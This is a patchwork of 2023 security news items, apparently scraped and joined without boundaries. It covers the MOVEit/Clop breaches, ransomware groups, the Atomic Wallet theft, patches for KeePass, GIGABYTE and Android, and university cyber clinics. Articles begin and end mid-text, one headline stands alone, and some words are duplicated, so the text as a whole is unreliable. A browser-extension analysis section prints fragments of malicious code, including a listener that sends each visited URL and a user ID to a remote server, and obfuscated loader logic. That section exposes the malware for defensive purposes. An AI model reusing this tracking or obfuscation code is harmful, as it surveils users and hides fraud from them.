On Monday, Microsoft was the first to attribute the attacks to the Clop ransomware operation, followed by the threat actors telling BleepingComputer that they started exploiting servers on May 27th.

After analyzing historic telemetry, Kroll security experts also found that the Clop gang likely tested the MOVEit Transfer zero-day since 2021 in limited attacks.

As expected, we are just starting to see the fallout from the attacks, with victims coming forward with announcements and data breach notifications.

The companies that have disclosed MOVEit Transfer breaches so far are listed below:

• Zellis - Their breach also impacted eight companies, including BBC, Aer Lingus, Boots, and British Airways.
• University of Rochester
• Government of Nova Scotia
• Extreme Networks
• US state of Illinois
• Minnesota Department of Education (MDE)

In other news, the Royal Ransomware gang has begun to test a new BlackSuit encryptor in limited attacks. As this is a self-contained ransomware operation with its own encryptor, Tor negotiation site, and data leak site, it's unclear how they plan on using BlackSuit in the future.

Other research released this week is on the new ransomware variants called Cyclops and Xollam.

There was an interesting development regarding Rhysida's ransomware attack on the Chilean army, with an Army corporal arrested for alleged involvement.

We also saw an attack on Japanese pharmaceutical company Eisai and Australia's largest commercial law firm, HWL Ebsworth, refusing to give into ALPHV's extortion demands.

Finally, we would be remiss for not sharing the excellent map of ransomware operations created by CERT Orange Cyberdefense threat intelligence researcher Marine Pichon.

Contributors and those who provided new ransomware information and stories this week include: @serghei, @LawrenceAbrams, @malwrhunterteam, @BleepinComputer, @demonslay335, @DanielGallagher, @fwosar, @billtoulas, @KrollWire, @Mar_Pich, @RedSenseIntel, @CISAgov, @FBI, @MsftSecIntel, @pcrisk, @TrendMicro, @PogoWasRight, @catabatarce, @GossiTheDog, @BrettCallow, and @uptycs.

June 4th 2023

CISA orders govt agencies to patch MOVEit bug used for data theft

CISA has added an actively exploited security bug in the Progress MOVEit Transfer managed file transfer (MFT) solution to its list of known exploited vulnerabilities, ordering U.S. federal agencies to patch their systems by June 23.

Rhysida ransomware group claims attack on Martinique

DataBreaches did not review all of the files leaked by the Rhysida ransomware group, but as the screencap of just a small portion of the file listing suggests, they do appear to be government-related files. Unlike other groups that often provide a brief summary of what kinds of files they are leaking, Rhysida offers no information on the size of the data leak or its contents.

June 5th 2023

Microsoft links Clop ransomware gang to MOVEit data-theft attacks

Microsoft has linked the Clop ransomware gang to recent attacks exploiting a zero-day vulnerability in the MOVEit Transfer platform to steal data from organizations.

Clop ransomware claims responsibility for MOVEit extortion attacks

The Clop ransomware gang has told BleepingComputer they are behind the MOVEit Transfer data-theft attacks, where a zero-day vulnerability was exploited to breach servers belonging to "hundreds of companies" and steal data.

A martial hacker: PDI detains an Army corporal for cyber attack on the internal networks of the military institution

Editors note: This is related to the Rhysida ransomware attack on Chilean military.

According to sources in the case, a series of electronic devices were seized from the soldier, which are now being examined by detectives. He was prosecuted for the crime of infringing the computer crime law, and after that he was in preventive detention.

Cyclops Ransomware and Stealer Combo: Exploring a Dual Threat

The Cyclops group is particularly proud of having created ransomware capable of infecting all three major platforms: Windows, Linux, and macOS. In an unprecedented move, it has also shared a separate binary specifically geared to steal sensitive data, such as an infected computer name and a number of processes. The latter targets specific files in both Windows and Linux.

New Dharma ransomware variants

PCrisk found new Dharma ransomware variants that append the .NBR and .thx extensions.

New STOP ransomware variants

PCrisk found new STOP ransomware variants that append the .nerz, .neon, and .neqp extensions.

June 6th 2023

Xollam, the Latest Face of TargetCompany

After first being detected in June 2021, the TargetCompany ransomware family underwent several name changes that signified major updates in the ransomware family, such as modifications in encryption algorithm and different decryptor characteristics.

June 7th 2023

CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability

According to open source information, beginning on May 27, 2023, CL0P Ransomware Gang, also known as TA505, began exploiting a previously unknown SQL injection vulnerability (CVE-2023-34362) in Progress Software's managed file transfer (MFT) solution known as MOVEit Transfer.

June 8th 2023

Royal ransomware gang adds BlackSuit encryptor to their arsenal

The Royal ransomware gang has begun testing a new encryptor called BlackSuit that shares many similarities with the operation's usual encryptor.

Clop ransomware likely testing MOVEit zero-day since 2021

The Clop ransomware gang has been looking for ways to exploit a now-patched zero-day in the MOVEit Transfer managed file transfer (MFT) solution since 2021, according to Kroll security experts.

An amazing map the ransomware ecosystem and its evolution

Marine Pichon put together an amazing, and likely painstaking, map illustrating the ransomware operations and the groups they are affiliated with. Well worth taking a look.

Japanese pharma giant Eisai discloses ransomware attack

Pharmaceutical company Eisai has disclosed it suffered a ransomware incident that impacted its operations, admitting that attackers encrypted some of its servers.

New Dharma variant

PCrisk found a new Dharma ransomware variant that appends the .mono extension.

June 9th 2023

BlackCat ransomware fails to extort Australian commercial law giant

Australian law firm HWL Ebsworth confirmed to local media outlets that its network was hacked after the ALPHV ransomware gang began leaking data they claim was stolen from the company.

University of Manchester says hackers ‘likely’ stole data in cyberattack

The University of Manchester warns staff and students that they suffered a cyberattack where threat actors likely stole data from the University's network.

That's it for this week! Hope everyone has a nice weekend!

The Week in Ransomware - June 9th 2023 - It’s Clop... Again!

Nvidia’s AI software tricked into leaking data

HWL Ebsworth is one of Australia's largest law firms, with an annual revenue of hundreds of millions of dollars, employing over 2,000 people and operating nine offices nationwide.

Last night, the ALPHV ransomware gang, also known as BlackCat, published 1.45 terabytes of data containing over a million documents allegedly stolen from the law firm's systems in April 2023. The cybercriminals are now threatening to leak more if the company doesn't meet their demands.

A spokesperson for the firm stated on ABC that they would not succumb to the threat actor's extortion demands, even if that means that they and their clients will have to suffer the consequences of a very exposing data leak.

"We take our ethical and moral duties to the community very seriously. We consider we have a fundamental civic duty to not, in any way, encourage or be seen to condone the criminal activity of extorting money by taking and threatening the publishing of other people's data," HWL Ebsworth told ABC.

"The privacy and security of our client and employee data remains of the utmost importance. We acknowledge and understand the impact this may have, and we are communicating closely with our clients."

Because the law firm naturally had business with the public sector, too, there are worries about the leaked documents containing sensitive or confidential information relating to matters of the state.

ABC lists the ANZ banking group, the South Australian, Queensland, and ACT governments, the Environment and Human Services Department, and the Australian Taxation Office (ATO) as current or former clients of HWL Ebsworth and potentially impacted by this incident.

Unfortunately, the leaked documents on BlackCat's site are easy to explore thanks to the threat group's indexed database that allows visitors to filter search results by filename or file type.

BleepingComputer has contacted HWL Ebsworth requesting a comment on the status of its operations and the progress of its internal investigation on the validity of the leaked data, but we have yet to hear back.

BlackCat ransomware fails to extort Australian commercial law giant

This adds an extra layer of security when using autofill to enter login credentials on websites. You can use fingerprint, facial recognition, or some other method supported by their operating system. For comparison, Keychain which is the default password manager on macOS already offers biometric authentication in Safari when using autofill to sign in on websites.

The biometric authentication feature comes almost a month after Google started rolling out Passkeys for desktops. Google Passkeys are meant to replace traditional passwords by allowing users to sign in using biometric options such as fingerprint and facial recognition.

While you can add new passwords directly, Google Password Manager is also getting the ability to import passwords from other apps. You can do so by uploading a CSV file exported from other password managers. For websites and accounts that require you to remember extra information like a customer ID, Google's password manager now lets you save that as a note.

To add a note to your saved password, go to Chrome Settings > Autofill > Password Manager. Under saved passwords, click on the password for which you want to add a note. Then, click on the Edit button under notes.

Google has also updated the password checkup tool on iOS to flag weak and reused passwords you have saved in the password manager. Also, a bigger and more tappable autofill prompt appears on iOS when you navigate to a login page in Chrome.

In separate news, Google has added new options to the picture-in-picture mode in Google Meet. The company also announced that Google Drive will drop support for Windows 8/8.1 and 32-bit versions of Windows later this year.

Google brings more security features to its password manager

When I looked into this extension, I immediately discovered a strange code block. Supposedly, it was buggy locale processing. In reality, it turned out to be an obfuscated malicious logic meant to perform affiliate fraud.

That extension wasn’t alone. I kept finding similar extensions until I had a list of 109 extensions, installed by more than 62 million users in total. While most of these extensions didn’t seem to contain malicious code (yet?), almost all of them requested excessive privileges under false pretenses. The names are often confusingly similar to established products. All of these extensions are clearly meant for dubious monetization.

If you aren’t interested in the technical details, you should probably go straight to the list of affected extensions.

Contents

    Malicious code
        Adblock all advertisments
        Translator - Select to Translate
        The Great Suspender and Flash Video Downloader
    What are the other extensions up to?
        Policy violations
        Access to all websites
        The webRequest/declarativeNetRequest permission
        Remote code execution
        User tracking
        Rudimentary functionality
    The companies developing these extensions
    The affected extensions

Malicious code

Altogether, I found malicious functionality in four browser extensions. There might be more, but I didn’t have time to thoroughly review more than a hundred browser extensions.

Adblock all advertisments

No, I didn’t mistype the extension name. It is really named like that.

When opened it up, this turned out to be the most lazy ad blocker I’ve ever seen. Its entire ad blocking functionality essentially consists of 33 hardcoded rules and a tiny YouTube content script.

But wait, there is some functionality to update the rules! Except: why would someone put rule updates into a tabs.onUpdated listener? This is the code running whenever a tab finishes loading (simplified):

let response = await fetch("https://smartadblocker.com/extension/rules/api", {
  method: "POST",
  credentials: "include",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({
    url: tab.url,
    userId: (await chrome.storage.sync.get("userId")).userId
  })
});
let json = await response.json();
for (let key in json)
  …

var base = e => e ? atob(e) : "parse";

function locales(callback)
{
  chrome.runtime.getPackageDirectoryEntry(dirEntry =>
  {
    dirEntry.getDirectory("_locales", {}, dir =>
    {
      const reader = dir.createReader();
      const promises = [];
      reader.readEntries(entries =>
      {
        for (const entry of entries)
        {
          if (!entry.name.startsWith("."))
          {
            promises.push(new Promise((resolve, reject) =>
            {
              const name = entry.name;
              entry.getFile("../messages.json", {}, entry =>
              {
                entry.file(file =>
                {
                  const fileReader = new FileReader();
                  fileReader.onloadend = () => {
                    resolve({
                      k: name,
                      v: JSON.parse(fileReader.result)
                    });
                  };
                  fileReader.readAsText(file);
                });
              });
            }));
          }
        }
        callback(promises);
      });
    });
  });
}

combine(locales.sort()
    .filter(locale => locale.k.charCodeAt(0) % 5 != 0)
    .map(locale => locale.v.v.message + locale.v.s.message)
    .join("")
);

var upd = data.upd;
var c = document[upd.cret](upd.crif);

{"settings":"{default:[true]}","license":"FREE","enable":"true","time":20946}

function handleResponseHeaders() {
  chrome.webRequest.onHeadersReceived.addListener(
    details => ({ responseHeaders: details.responseHeaders }),
    { urls: ["<all_urls>"] },
    [
      "blocking",
      "responseHeaders"
    ]
  );
}

This attribution is from the blockchain experts at Elliptic, who have been tracking the stolen funds and their movements across wallets, mixers, and other laundering pathways.

The attack on Atomic Wallet occurred last weekend when numerous users reported that their wallets were compromised and their funds had been stolen.

While the investigation into the incident was underway, crypto-analyst ZachXBT calculated the losses to be over $35 million, with the largest single victim losing almost 10% of the stolen total.

Yesterday, Elliptic reported that its analysis points to Lazarus Group as the threat actors responsible for the attack, making this the hackers'hackers' first major crypto heist for 2023.

Last year, the FBI attributed to Lazarus the Harmony Horizon Bridge hack in June 2022, which resulted in the theft of $100 million, and also the March 2022 hack of Axie Infinity, from which the North Koreans siphoned $620 million in crypto.

The latest attack on Atomic Wallet shows that the threat actors remain laser-focused on monetary goals, which experts have said are directly used to fund North Korea's weapons development program.

"At Elliptic, we have identified a large number of victim wallets, allowing the stolen funds to be traced in our software," reads Elliptic'sElliptic's report.

"Our analysis of the thief's transactions leads us to attribute this hack to North Korea'sKorea's Lazarus Group, with a high level of confidence."

Tracing the transactions

The first evidence pointing to the Lazarus group is the observed laundering strategy, which matches patterns seen in previous attacks by the particular threat actor.

The second attribution element is using the Sinbad mixer for laundering the stolen funds, which the threat group also used in the Harmony Horizon Bridge hack.

Elliptic has previously said that North Korean hackers have passed tens of millions of USD through Sinbad, demonstrating confidence and trust in the new mixer.

The third and most significant proof of Lazarus' involvement in the Atomic Wallet hack is that substantial portions of the stolen cryptocurrency ended up in wallets that hold the proceeds of previous Lazarus hacks and are assumed to belong to group members.

As last year's attacks have shown, successfully stealing cryptocurrency only accomplishes half the objective.

The rise of blockchain monitoring firms, coupled with the enhanced capabilities of law enforcement agencies, has significantly complicated the laundering process and subsequently cashing out the stolen assets.

As victims notify exchanges of wallet addresses containing stolen funds, preventing them from being exchanged for other crypto or fiat, it causes the hackers to turn to less scrupulous exchanges that take a hefty commission to launder the money.

Lazarus hackers linked to the $35 million Atomic Wallet heist

Small businesses and community nonprofits are often sitting ducks for hackers. But across the United States, programs are springing up to connect these vulnerable organizations with fresh-faced defenders: college students.

Local businesses and other small organizations are facing an onslaught of cyberattacks, but federal agencies like the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) are stretched too thin to help them all implement basic security measures. To fill this gap, public and private universities are launching cybersecurity centers modeled on law school legal clinics to train students as digital security consultants.

In a country besieged by endless hacking campaigns that disproportionately burden small, under-resourced businesses, and with national agencies focused on more serious threats to critical infrastructure, university clinics could be the future of cyber defense at the local level.

“There is a critical role for universities to play in community cyber defense,” says Sarah Powazek, who leads the University of California, Berkeley’s cyber clinic. “Students are local, highly motivated, and able to provide a range of services pro bono for under-resourced organizations that otherwise couldn’t afford them.”

In just a few months, the newest of these clinics will launch as a pilot project at the University of Texas at Austin, joining other schools that have formed a consortium to share ideas and lessons learned. But UT-Austin’s pilot program has a unique origin story. It was born out of conversations within CISA’s outside advisory board about an even more ambitious idea: a cyber 311 service offering emergency help to local businesses, modeled on the municipal hotlines that residents call to report potholes and broken street lights.

Because sending college students to help companies recover from hacks raises a host of logistical and legal questions, UT-Austin’s clinic will first evaluate the simpler task of offering pre-attack guidance. But the program’s leaders say they’re still interested in the 311 concept that inspired the clinic—and if they can eventually make it work, it could help make colleges the cybersecurity backbones of their communities.

A Closely Watched Project

The US faces twin cyber crises: Companies often lack the resources and knowledge to effectively protect themselves from hackers, and there are too few trained professionals to fill the cyber field’s many open jobs. Small- and medium-size businesses fall below a “cyber poverty line,” struggling to achieve even basic resilience. The persistent talent shortage—there are an estimated 756,000 vacant cyber positions in the US—only makes things worse.

Enter the cyber clinic.

For decades, law schools have used clinics to train future lawyers and support their communities with pro bono work. “There’s no learning like the learning that involves an actual, real client,” says Robert Chesney, the dean of UT-Austin’s law school, head of the university’s cybersecurity program, and founder of the new cyber clinic. “Everybody says those experiences are the most impactful things that they do.”

In recent years, universities have begun using a similar model to tackle cyber threats. Schools in Alabama, California, Indiana, Massachusetts, and several other states now operate cyber clinics.

The idea for the UT-Austin project emerged from discussions in CISA’s Cybersecurity Advisory Committee, a group of experts from the private sector, academia, civil society, and local government. During conversations about a university running a municipal cyber helpline, Austin quickly emerged as the ideal candidate, thanks to its already popular 311 service and the support of two committee members: Steve Adler, who was then Austin’s mayor, and Chesney, an influential UT faculty member.

CISA director Jen Easterly has championed the project and recently told the advisory committee that her agency will consider launching a nationwide cyber 311 system after evaluating Austin’s new clinic and similar efforts.

“The UT-Austin pilot is helping us better understand how we can provide cybersecurity services for small and medium-size businesses across our nation,” Easterly says in a statement, adding that she is “truly excited” about it.

Building a Clinic

UT-Austin’s clinic will take the form of a two-semester course. In the fall, Francesca Lockhart, a former top Texas homeland security official Chesney recruited to lead the project, will teach students cybersecurity skills and partner them with local organizations and businesses, giving students time to learn how those organizations operate and what they need. In the spring, teams of students will then create and implement cybersecurity improvement plans for their clients.

Lockhart’s curriculum will cover lessons like inventorying the devices on a network, scanning for and fixing known vulnerabilities, configuring a firewall, conducting penetration testing, and understanding the Linux operating system and the Python programming language, which are widely used in diagnosing and fixing security issues.

The 20 people in the inaugural class include students majoring in business and computer science, but also those studying biochemistry and international relations. Lockhart is still evaluating a variety of potential clients, including small businesses; nonprofits serving vulnerable populations in Austin; neighboring school districts and city governments; and startups focused on fighting hunger, disease, and other social ills.

Lockhart says the clinic represents “a great opportunity to get students real-world career experience and fill the cybersecurity workforce gap while also serving the needs of some of these under-resourced organizations.”

Any expansion to a 311-type service is far off. “You need to walk before you run,” Chesney says.

Expanding the Scope

To Steve Adler, Austin’s former mayor, a cyber helpline would be a natural extension of the UT-Austin project.

Austin’s 311 service already gets calls from people worried about phishing scams and other low-level cyberattacks. The next step would be to create a referral system so 311 operators could turn certain calls over to UT-Austin students trained to handle a wide range of common incidents. “It might expand the scope of what people think would be covered by a 311 call,” says Adler, who served as mayor from 2015 to 2023.

Another state is already forging ahead with this idea. Later this year, Bridgewater State University in Massachusetts will launch a security operations center (SOC) to answer emergency calls from the community. The 24/7 SOC, created in partnership with a state-funded consortium, will be staffed by professional cyber experts, but students will be able to observe and participate in their work.

Chesney finds the 311 idea very appealing. “It’d be really great if we could get to that stage,” he says, in part because it would deepen ties between the school and the surrounding community, a constant priority for colleges. “It brings the town and the gown together,” Chesney says. “And it may end up being very central over time.”

But many questions need to be answered first. What kinds of calls will the clinic be able to take? How will the increased call volume affect regular 311 operations? Will hacking victims even want to admit their problems and ask for help?

Then there are the legal issues. Responding to a cyber crisis could expose students and faculty to liability. Universities are “incredibly risk-averse,” says UC Berkeley’s Powazek, and many resist offering even traditional clinic services, fearing that clients will sue if they’re later hacked.
‘Basic Blocking and Tackling’

Before the clinic can evolve, Chesney and Lockhart have to launch it and see if it makes a difference.

Measuring success won’t be easy. The clinic can track how many students it trains, how many organizations it helps, and how much it all costs. But whether its clients actually emerge more secure will be tricky to determine. Chesney says the clinic will conduct “satisfaction surveys” and stay in touch with clients over time to see if its advice sticks. It will also track alumni’s career paths to see if it’s moving the needle on the workforce issue.

UT-Austin is already having “preliminary discussions” with other universities that want to launch similar clinics, according to Chesney. “All of this is meant to be replicated and copied and used elsewhere,” he says.

Not every school will be able to launch a cyber helpline for their community, but Chesney thinks large universities like his should be able to do so.

Whatever UT-Austin’s program ends up looking like, Chesney is clear about the ultimate goal: to “level up the difficulty, systematically across society, for the bad guys to get into the system.”

“The sooner we can get everyone doing basic blocking and tackling,” he says, “the better off we’re all going to be.”

Source

The companies were the first major victims after hackers successfully breached a popular file transfer software called MOVEit. The Clop ransomware group, thought to be based in Russia, has threatened on its dark web site that stolen data, including personal details such as names and home addresses, could be published.

"We are working to fully understand the U.K. impact following reports of a critical vulnerability affecting MOVEit Transfer software being exploited," Britain's National Cyber Security Center said in a statement.

"The NCSC strongly encourages organizations to take immediate action by following vendor best practice advice and applying the recommended security updates," it added.

MOVEit is a program widely used by businesses to securely share files online. Zellis, a leading payroll services provider in the U.K. that works with British Airways, the BBC and hundreds of others, was one of its users. Zellis said Monday a "small number" of its customers have been affected by the breach.

It is thought that hackers broke into the software and used that to gain access to the databases of potentially hundreds of other companies.

"This incident happened because of a new and previously unknown vulnerability in a widely used MOVEit file transfer tool," British Airways said in a statement. "We have notified those colleagues whose personal information has been compromised to provide support and advice."

The BBC, which employs about 22,000 people worldwide, said it was working with Zellis as it sought to establish the extent of the breach.

The broadcaster said in an email sent Monday to all U.K. staff and freelancers that data including birthdates, national insurance numbers and home addresses was disclosed. But it said bank account details had apparently not been compromised, and there was "no evidence that the data is being exploited."

Drugstore chain Boots, which employs more than 50,000 people, also said it had made staff aware of the hack.

BA and Zellis said they had reported the incident to Britain's Information Commissioner's Office.

© 2023 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed without permission.

Source

Google Workspace users can now log in without a password, thanks to passkeys

This remarkable feature brings an unprecedented level of convenience, ease, and assurance to daily journeys, be it a morning run or a late-night walk home.

How does iOS 17 Check In feature work?

With iOS 17 Check In feature, users simply initiate the feature when commencing their travels. Whether it's an early morning jog or a post-celebration stroll, activating iOS 17 Check In feature sets the gears in motion.

Once the iPhone user reaches their intended destination, a notification is promptly sent to their designated contacts, signifying a successful arrival. This real-time communication ensures loved ones are promptly informed, alleviating any concerns they may have had during the waiting period.

iOS17 Check In feature will provide real-time details about users' locations - Image: Apple

You can adjust arrival time on the go

iOS 17's Check-In feature takes into account the unpredictability of travel, offering users the option to amend their estimated arrival time. When circumstances arise that hinder progress towards the destination, such as heavy traffic or unexpected delays, Check-In intelligently recognizes the lack of advancement and provides an opportunity to extend the estimated commute time. This valuable feature ensures that loved ones receive accurate information and eliminates any potential anxiety caused by unexpected delays.

Furthermore, Apple has implemented additional safeguards in the event that the recipient of the Check-In message fails to respond. If no reply is received, a range of vital details is automatically shared to provide a comprehensive overview of the journey. These details include the exact route taken, the remaining battery percentage of the user's iPhone, and the status of their cellular service.

Such information proves invaluable to parents, as they gain insights into their children's commute and can assess whether they have sufficient battery life to receive a call or if they have reached their destination but simply forgotten to communicate as promised.

iOS17 Check In feature provides instant updates

Automated real-time alerts

iOS Check In feature revolutionizes the way iPhone users communicate their safety during solo travel. This seamless and automatic mechanism ensures that loved ones are alerted promptly in case of any untoward incidents or delays.

The feature's versatility in adjusting the estimated arrival time and the provision of essential journey details further enhance user safety. Parents, in particular, will appreciate the enhanced peace of mind this iOS 17 Check In feature provides, knowing that their loved ones can communicate their safe arrival.

Check out what else is on iOS 17 here.

Apple introduces revolutionary iOS 17 Check In safety feature

This outage follows two major outages yesterday, creating widespread disruptions for global Outlook users, preventing users worldwide from reliably accessing or sending email and using the mobile Outlook app.

Outlook users have taken to Twitter to complain about the spotty email service, stating that it is affecting their productivity.

Microsoft says these outages are caused by a technical issue, posting to Twitter a series of updates switching between saying they mitigated the issues and saying that the problem is happening again. 

"We've identified that the impact has started again, and we're applying further mitigation," tweeted Microsoft.

"Telemetry indicates a reduction in impact relative to earlier iterations due to previously applied mitigations. Further details about the workstreams are in the admin center via MO572252."

Group claims to DDoS Microsoft Outlook

While Microsoft claims technical issues cause the outages, a group known as Anonymous Sudan is claiming to be behind them, warning that they are performing DDoS attacks on Microsoft to protest the US getting involved in Sudanese internal affairs.

"We can target any US company we want. Americans, do not blame us, blame your government for thinking about intervening in Sudanese internal affairs. We will continue to target large US companies, government and infrastructure," Anonymous Sudan posted to their Telegram channel yesterday.

"We hope you enjoyed it, Microsoft"

Since then, the group has been taunting Microsoft in statements about the repeated DDoS attacks on Microsoft Outlook and Microsoft 365 services.

"Microsoft, today we played football with your services. Let's play a fun game. The fate of your services, which is used by hundreds of millions of people everyday, is under our dominion and choice," Anonymous Sudan posted to their Telegram channel.

"You have failed to repel the attack which has continued for hours, so how about you pay us 1,000,000 USD and we teach your cyber-security experts how to repel the attack and we stop the attack from our end?"

From the check-host.net URLs shared by Anonymous Sudan, they say they are targeting "https://outlook.live.com/mail/0/," the main URL for the Outlook.com web service.

While these claims remain unverified, the service has been sluggish and plagued by a series of outages over the past 24 hours.

BleepingComputer contacted Microsoft about Anonymous Sudan's claims, but a response was not immediately available.

Outlook.com hit by outages as hacktivists claim DDoS attacks

The new security patch level 2023-06-05 integrates a patch for CVE-2022-22706, a high-severity flaw in the Mali GPU kernel driver from Arm that Google’s Threat Analysis Group (TAG) believes it may have been used in a spyware campaign targeting Samsung phones.

"There are indications that CVE-2022-22706 may be under limited, targeted exploitation," reads Google's latest bulletin. CISA also highlighted the active exploitation of CVE-2022-22706 in an advisory released in late March.

With a score of 7.8 out of 10, the high-severity security issue allows non-privileged users to get write access to read-only memory pages.

According to Arm, the issue impacts the following kernel driver versions:

• Midgard GPU Kernel Driver: All versions from r26p0 – r31p0
• Bifrost GPU Kernel Driver: All versions from r0p0 – r35p0
• Valhall GPU Kernel Driver: All versions from r19p0 – r35p0

Arm fixed the issue in Bifrost and Valhall GPU Kernel Driver r36p0 and in Midgard Kernel Driver r32p0, but the fix trickled into the stable version of Android only now.

It is worth noting that Samsung addressed CVE-2022-22706 in its May 2023 update. The company's quick response to the active exploitation of the flaw is likely due to its users being explicitly targeted by the spyware campaign.

The critical-severity flaws fixed in this month’s Android update include:

1. CVE-2023-21127 – Remote code execution flaw in Android Framework, impacting Android 11, 12, and 13. Fixed in security patch level “2023-06-01.”
2. CVE-2023-21108 – Remote code execution flaw in Android System, impacting Android 11, 12, and 13. Fixed in security patch level “2023-06-01.”
3. CVE-2023-21130 – Remote code execution flaw in Android System, impacting Android 13. Fixed in security patch level “2023-06-01.”
4. CVE-2022-33257 – Critical flaw of an undefined type, impacting Qualcomm closed-source components. Fixed in security patch level “2023-06-05.”
5. CVE-2022-40529 – Critical flaw of an undefined type, impacting Qualcomm closed-source components. Fixed in security patch level “2023-06-05.”

Devices running Android 10 or older are no longer supported and will not receive this security update.

Users of outdated devices should be aware of the risk of a potential impact. They should either switch to a newer, actively supported Android model or turn to a third-party Android distribution that still provides security fixes, even if these typically come with a delay.

Source

The firmware updates were released last Thursday in response to a report by hardware security company Eclypsium, who found flaws in a legitimate GIGABYTE feature used to install a software auto-update application in Windows.

Windows includes a feature called Windows Platform Binary Table (WPBT) that allows firmware developers to automatically extract an executable from the firmware image and execute it in the operating system.

"The WPBT allows vendors and OEMs to run an .exe program in the UEFI layer. Every time Windows boots, it looks at the UEFI, and runs the .exe. It's used to run programs that aren't included with the Windows media," explains Microsoft.

GIGABYTE motherboards use the WPBT feature to automatically install an auto-update application to '%SystemRoot%\system32\GigabyteUpdateService.exe' on new installations of Windows.

While enabled by default, this feature can be disabled in the BIOS settings under the Peripherals tab > APP Center Download & Install Configuration configuration option.

However, Eclypsium discovered various security flaws in this process that attackers could potentially exploit to deliver malware in man-in-the-middle (MiTM) attacks.

Eclypsium found that when the firmware drops and executes the GIGABYTEUpdateService.exe, the executable will connect to one of three GIGABYTE URLs to download and install the latest version of the auto-update software.

The problem is that two of the URLs used to download the software utilize non-secure HTTP connections, which can be hijacked in MiTM attacks to install malware instead.

Furthermore, the researchers found that GIGABYTE did not perform any signature verification for downloaded files, which could prevent malicious or tampered files from being installed.

In response, GIGABYTE has now released firmware updates for Intel 400/500/600/700 and AMD 400/500/600 series motherboards to fix these issues.

"To fortify system security, GIGABYTE has implemented stricter security checks during the operating system boot process. These measures are designed to detect and prevent any possible malicious activities, providing users with enhanced protection:

1. Signature Verification: GIGABYTE has bolstered the validation process for files downloaded from remote servers. This enhanced verification ensures the integrity and legitimacy of the contents, thwarting any attempts by attackers to insert malicious code.

2. Privilege Access Limitations: GIGABYTE has enabled standard cryptographic verification of remote server certificates. This guarantees that files are exclusively downloaded from servers with valid and trusted certificates, ensuring an added layer of protection." - GIGABYTE.

While the risks from these vulnerabilities is likely low, all GIGABYTE motherboard users are advised to install the latest firmware updates to benefit from the security fixes.

Furthermore, if you wish to remove the GIGABYTE auto-update application, you should first turn off the 'APP Center Download & Install Configuration' setting in the BIOS and then uninstall the software in Windows.

GIGABYTE releases new firmware to fix recently disclosed security flaws

When creating a new KeePass password manager database, users must create a master password, which is used to encrypt the database. When opening the database in the future, users are required to enter this master key to decrypt it and access the credentials stored within it.

However, in May 2023, security researcher 'vdohney' disclosed a vulnerability and proof-of-concept exploit that allowed you to partially extract the cleartext KeepPass master password from a memory dump of the application.

"The problem is with SecureTextBoxEx. Because of the way it processes input, when the user types the password, there will be leftover strings," explained vdohney in a KeePass bug report.

"For example, when "Password" is typed, it will result in these leftover strings: •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d."

This dumper allows users to recover almost all master password characters apart from the first one or two, even if the KeePass workspace is locked or the program was closed recently.

Information-stealing malware or threat actors could use this technique to dump the program's memory and send it and the KeePass database back to a remote server for offline retrieval of the cleartext password from the memory dump. Once the password is retrieved, they can open the KeePass password database and access all the saved account credentials.

KeePass's creator and main developer, Dominik Reichl, acknowledged the flaw and promised to release a fix soon, having already implemented an effective solution being tested in beta builds.

KeePass 2.5.4 fixes vulnerability

Over the weekend, Reichl released KeePass 2.54 sooner than expected, and all users of the 2.x branch are strongly recommended to upgrade to the new version.

Users of KeePass 1.x, Strongbox, or KeePassXC are not impacted by CVE-2023-32784 and, thus, do not need to migrate to a newer release.

To fix the vulnerability, KeePass is now using a Windows API to set or retrieve data from text boxes, preventing the creation of managed strings that can potentially be dumped from memory.

Reichl also introduced "dummy strings" with random characters into the memory of the KeePass process to make it harder to retrieve fragments of the password from memory and combine them into a valid master password.

KeePass 2.5.4 also introduces other security enhancements, such as moving 'Triggers,' 'Global URL overrides,' and 'Password generator profiles' into the enforced configuration file, which provides additional security from attacks that modify the KeePass configuration file.

If the triggers, overrides, and profiles aren't stored in the enforced config because they were created using a previous version, they will be disabled automatically in 2.54, and users will have to manually activate them from the 'Tools' settings menu.

Users who cannot upgrade to KeePass 2.54 are recommended to reset their master password, delete crash dumps, hibernation files, and swap files that might contain fragments of their master password, or perform a fresh OS install.

Keep in mind that the issue impacts only passwords typed in the program's input forms, so if the credentials are copied and pasted into the boxes, no data-leaking strings are created in memory.

KeePass v2.54 fixes bug that leaked cleartext master password

Blatant tech frauds run amok on the biggest online marketplaces

Atomic Wallet is a mobile and desktop crypto wallet allowing users to store various cryptocurrencies. The wallet is offered for multiple operating systems, including Windows, Android, iOS, macOS, and Linux.

On June 3rd, Atomic Wallet tweeted that they had received reports of compromised wallets and had begun investigating the issue.

"We have received reports of wallets being compromised. We are doing all we can to investigate and analyse the situation. As we have more information, we will share it accordingly," tweeted Atomic Wallet.

A tweet published today says they are now working with third-party security companies to investigate the incident and block the stolen funds from being sold on exchanges.

"Update: The investigation is still ongoing in a joint effort with the leading security companies. The team is working on possible attack vectors," tweeted the developers today.

"Nothing yet confirmed. Support team is collecting victim addresses. Reached out to major exchanges and blockchain analytics companies to trace and block the stolen funds."

The developers have since taken down their download server, 'get.atomicwallet.io,' likely out of concern that their software was breached and to prevent the spread of further compromises.

Blockchain sleuth ZachXBT has been collecting transactions of funds stolen from Atomic Wallet victims and says that over $35 million in crypto has been stolen due to this compromise.

"Just surpassed $14M worth of stolen funds on my graph across Bitcoin, ETH, Tron, BSC, ADA, Ripple, Polkadot, Cosmos, Algo, Avax, XLM, LTC and Doge," explained ZachXBT. 

The researcher later stated that additional transactions boosted the stolen amount above $35 million.

According to crypto security research Tay, the earliest transaction for stolen Atomic Wallet assets was on Friday, June 2nd, at 21:45 UTC.

A weekend crypto theft

Atomic Wallet users began reporting Saturday morning on Twitter and the developer's Telegram channel that cryptocurrency was stolen from their Atomic Wallet wallets.

Atomic Wallet is now collecting information from victims, asking what operating system they are using, where they downloaded the software, what was done before crypto was stolen, and where the backup phrase was stored.

Victims are also asked to submit this information, and more, on a Google Docs form that was created to investigate the incident.

While some users report that their crypto was stolen after a recent software update, others report [1, 2, 3, 4] that they have never done an update and their crypto was still stolen.

At this time, it is unclear how the compromise took place, but users are advised to transfer their crypto assets to other wallets while the developers investigate the security incident.

